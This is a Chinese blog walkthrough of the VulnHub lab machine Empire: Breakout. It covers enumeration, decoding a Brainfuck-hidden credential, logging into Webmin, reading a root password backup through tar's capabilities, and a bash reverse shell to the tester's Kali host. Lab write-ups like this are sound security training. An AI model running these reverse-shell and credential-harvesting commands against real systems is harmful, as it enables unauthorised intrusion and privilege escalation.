[渗透测试学习靶机02] vulnhub靶场 Empire: Breakout

最新推荐文章于 2024-07-07 15:37:49 发布
最新推荐文章于 2024-07-07 15:37:49 发布
阅读量873 收藏 9
点赞数 7
分类专栏: 渗透测试 vulnhub靶机 文章标签: 学习 linux 网络安全 安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47112073/article/details/127253348
版权

kali IP地址为192.168.127.139

靶机 IP地址为192.168.127.141

目录

一、信息搜集

 1.1、扫描主机口

 1.2、端口扫描

 1.3、目录扫描

2、枚举漏洞

2.1、枚举信息

2.2、端口分析

3、漏洞利用

3.1、利用webadmin漏洞

4、权限提升

4.1、寻找suid权限程序提权

4.2、寻找Capabilities(功能)程序

4.3、信息收集获取root密码

4.4、利用webadmin后台反弹shell提权

一、信息搜集

 1.1、扫描主机口

 1.2、端口扫描

探测主机开放的端口服务,我们发现开放了  80  445 10000 20000等端口

 1.3、目录扫描

目录扫描,发现没有什么

 查看nmap扫出的端口相关URL,发现只有10000、20000端口是一个登录页面,猜测应该会有Webadmin的漏洞

2、枚举漏洞

挖掘思路——根据端口开放情况查找对应服务的漏洞

2.1、枚举信息

文件共享服务可以使用 enum4linux来枚举信息

如上图,发现得到用户名:cyber

2.2、端口分析

紧接着我们进行端口分析,访问80端口:是一个apache默认页面,我们发现没有什么东西,可以

查看网页源码,发现一串秘文,找到突破口

192.168.127.141:80

 

 

 

很明显是 brainfuck 加密的数据,搜索对应在线解密网站,得到一串数字,百度找了在线解密,没有合适的,这里我用的网站是

CTF|CTF宸ュ叿涓嬭浇|CTF宸ュ叿鍖厊CTF鏁欑▼

https://tool.bugku.com/
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


-->

用户名: cyter  密码:.2uqPEfj3D<P'a-3

用户名: cyter  密码:.2uqPEfj3D<P'a-3

尝试去登陆 webadmin

 发现10000端口没成功,20000端口成功登录

3、漏洞利用

3.1、利用webadmin漏洞

在这里找到了一个command shell(如下图标红的框的地方),发现能登陆后台,在网页上打开控制台,打开得到第一个flag

4、权限提升

4.1、寻找suid权限程序提权

shell 中寻找 suid 程序:find / -perm -u=s -type f 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

没有发现( https://gtfobins.github.io/对比) 

4.2、寻找Capabilities(功能)程序

在用户目录下查看文件可以发现一个二进制文件tar

CTF 中每当看到二进制文件的副本时

都应该检查一下其 Capabilities(功能) suid 程序。

查询当前目录下 tar 文件的功能:getcap tar

 还可以加参数-r 递归查询: getcap -r / 2>/dev/null,发现了2个文件

可以尝试查找一些敏感文件,使用tar读取 

4.3、信息收集获取root密码

使用以下命令查询有pass关键字的文件

find / -name '*pass*' 2</dev/null

find / -name '*pass*' 2</dev/null

 

 

可以发现有一个备份文件是 root 用户以及组的,尝试使用 tar 压缩

./tar -cf bak.tar /var/backups/.old_pass.bak

tar -xf bak.tar

cat var/backups/.old_pass.bak


./tar -cf bak.tar /var/backups/.old_pass.bak
tar -xf bak.tar
cat var/backups/.old_pass.bak

获取密码:Ts&4&YurgtRX(=~h

Ts&4&YurgtRX(=~h

4.4、利用webadmin后台反弹shell提权

在kali中开启监听:nc -lvp 6666

nc -lvp 6666

在 webadmin 后台,执行以下命令

bash -c 'bash -i >& /dev/tcp/192.168.127.139/6666 0>&1

bash -c 'bash -i >& /dev/tcp/192.168.127.139/6666 0>&1

'

切换root用户,输入密码

权限提升成功,完结!!!

总结:

整体来说该靶机难度比较简单,前面的信息搜集完了之后,可以先从webmin入手,想到两个CVE,一个不需要登录,验证不存在,另一个需要登录,又先放下,去挖80端。从80端口的源码中发现一个brainfuck加密的数据,解密后得到了一个密码。又去看samba服务,收集到一个cyber用户,以此为账号密码登录webmin 成功,另一个CVE也验证失败,最后从web后台界面找到一个 可以执行 command shell 的地方 反弹shell成功。

提权 依靠 cyber用户下 存在一个 具有可执行的root权限的 tar命令,又找到一个root的密码备份文件,以发现的tar命令压缩备份文件(.tar),又以当前用户的tar命令解压(tar)出该文件,权限就变为cyber用户的权限,读取到密码,su root 提权成功。

大风呼呼的
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
webmin 远程代码漏洞复现
weixin_54584489的博客
12-20 2421
漏洞简介 webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行 漏洞环境搭建 Webmin 1.920 kali执行终端命令:wget https://sourceforge.net/projects/webadmin/files/webmin/1.920/w
DC-2靶场渗透实战练习
qq_30889301的博客
08-11 386
入门靶场,dc-2靶场渗透实战。
bugku渗透测试2
最新发布
vsdfbhsdhsdfh的博客
07-07 405
bugku渗透测试靶机2
pWnOS2.0靶场渗透练习&udf提权&推荐练习靶场&较经典的web渗透靶场&红队靶场
jockerboss的博客
03-12 1008
pWnOS2.0靶场练习&udf提权&推荐练习靶场&较经典的web渗透靶场&小白必练
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1406
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
网络渗透测试基础之帝国empire
m0_65369792的博客
05-19 308
一. ​Empire介绍 Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 二.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
PowerShell Empire实战入门篇
jennycisp的博客
10-30 324
PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。Empire详情介绍参考官方网站:http://powershellempire.com/CSDN大礼包
Web漏洞-敏感信息泄露-后台地址爆破
fzy2003的博客
07-06 1913
虽然后台地址泄露无法对网站造成直接威胁,但是后台地址泄露以后能够把网站一些敏感信息暴露,从而增加被攻击的风险。
kali中使用vulhub搭建漏洞测试靶场
qq_39756628的博客
04-23 928
vulhub简介 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,docker可以实现虚拟机隔离应用环境的功能,并且开销比虚拟机小。 Vulhub的官方网址:https详细搭建步骤vulhub简介一、安装Docker1.安装https协议、CA证书2.安装docker二、安装Docker-compose1.安装PIP2.安装docker-compose三、下载是vulhub 一、安装Docker 1.安装https协议、C
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1686
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
VulnHub靶场渗透实战-Tomato
随心所欲不逾矩
09-01 1903
特莫特来啦!靶机环境:Vmware网络:NAT模式靶场难度:中一难结果:利用文件包含漏洞提权。
CVE-2019-15107 webmin RCE漏洞复现
永远是少年
12-10 992
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webmin RCE漏洞复现。 一、CVE-2019-15107 webmin RCE漏洞简介与环境搭建 二、CVE-2019-15107 webmin RCE实战
webmin远程命令执行漏洞(CVE-2019-15107)
m0_49025459的博客
12-06 1014
漏洞概述 1.漏洞编号:CVE-2019-15107 2.漏洞描述:该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码 3、受影响的版本:Webmin
Webmin远程命令执行漏洞复现
yuan_boss的博客
10-12 527
详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值